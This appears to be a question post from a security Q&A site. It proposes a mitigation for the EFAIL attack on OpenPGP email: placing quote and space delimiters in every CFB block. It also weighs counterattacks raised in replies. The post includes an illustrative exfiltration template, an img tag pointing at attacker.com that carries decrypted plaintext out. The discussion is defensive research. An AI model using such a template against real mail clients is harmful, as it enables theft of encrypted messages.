The proposed method
Brief and simplified description of the attack:
Any and every single encrypted block B of the encrypted message can be surrounded by Trojan psuedo-encrypted data to give a multiblock encrypted message ABC. The A and C parts are cleverly chosen such that when ABC is decrypted it yields a message of the form:
<img src=http://attacker.com/"[...][block B plaintext][...]">
which is valid HTML syntax with a img tag, an attribute src and an a corresponding value which is a syntactically valid URL. The decrypted plaintext of encrypted block B is embedded in the URL, after the attackers valid address.
Depending upon the readers email client software and settings, the email client will automatically issue an HTTP request to the URL, causing the plaintext of B to be exfiltrated to the attacker.
This explanation is oversimplified in a way that overstates and doesn't understate the capacity of the EFAIL strategy. Hence it will be sufficient to show a EFAIL mitigation strategy that defeats this oversimplified explanation.
Important: An encrypted block is a specific technical term referring to the CBF block encoding algorithm specified in RFC4880 13.9. OpenPGP CFB Mode. Block B is of fixed size (16 bytes for all AES ciphers), and the block boundaries of B are fixed at the time of encryption. The attacker has no control over the choice of block boundaries, and cannot alter them.
Obfuscation using HTML syntax
Because each block is vulnerable, the solution works by individually protecting each block against being wholly included as the value part of an HTML attribute. It is possible because the attacker is restricted to dividing the message along existing encrypted block boundaries.
The solution is very simple. The plaintext to be encrypted in a single block is divided into two parts. This first part is the obfuscating string o, and the second part is the message m. The choice of o prevents m from being included in the attackers attribute value.
Specifically, the obfuscating string o must have a least the three characters single quote ('), double quote ("), and space ( ). That's enough for force the closure of the HTML attribute and protect the message m. This is decided by the HTML specifications
You can play around with the attackers choice of starting delimiters in this Try jsoup sandbox example (https://try.jsoup.org/%7E_nyXks5PuAs-zJeek8CVhpuAvtI)
When decrypted by the user in its raw form the total message will be human readable but a little ugly because it contains the obfuscation string o, but it will be safe from EFAIL.
This method requires no compression be done before encryption, as that would ruin the block boundaries.
It is notable that the researchers discounted the possibility of using delimiters as a mitigation strategy in their online summary. However, it can assumed that they just didn't consider the case of delimiters deliberately placed with respect to encryption block boundaries.
The question
Is there some other form of HTML string which could be used by the attacker to overcome the proposed EFAIL mitigation and allow exfiltration?
EDIT:
The first part of @Anders answer suggests a suitable counterattack to defeat the proposed method as originally written, at least on a sufficient subset of browsers to matter.
Just consider UTF8, UTF16-BE, and UTF16-LE. There are other possible encodings but in all of those the HTML delimiter characters are going to have the same values as in those three encodings. I don't believe any browsers support UTF-32. If a significant number did that would change things.
In order to defend against all of the possible encodings UTF8, UTF16-BE, and UTF16-LE, each of the three delimiters ( ) (") and (') would have to be included in each encoding, for each block.
It would suffice to include this 12 byte string: [NULL] ["] [NULL] ['] [NULL] [ ] ["] [NULL] ['] [NULL] [ ] [NULL] to defend against all 3 encodings. But that would only leave 4 bytes per 16 bytes block to hold message.
I give @Anders an upvote. But withhold selection as a correct answer due to other hand waving in the answer. We can talk about many imaginable attacks but they are not there until they are there. And even then they might have limitations that count them out. I'd select the answer if the hand waving were removed.
@SteffenUllrich and @Anders, in comments and answer, also suggest another attack: Introducing via HTML code a window wide invisible button that will be accidentally clicked to invoke a js script included the html and send information over the web or invoke mail return, etc.
Many browsers don't support javascript.
Thunderbird doc says this:
Due to various security considerations. Javascript has been disabled completely in message content (the javascript.allow.mailnews preference no longer has any effect). Javascript is enabled for remote content including RSS feeds.
Apparently gmail also strips javascript from all mail before display.
Considering that arbitrary plaintext can be inserted into captured mail containing an otherwise valid an unmodified encrypted message, this is a higher level problem with mail clients if they don't sandbox or sterilize decrypted messages, or all mail for that matter. It's certainly not limited to any particular encryption standard, like OpenPGP.
So I count this as a side issue.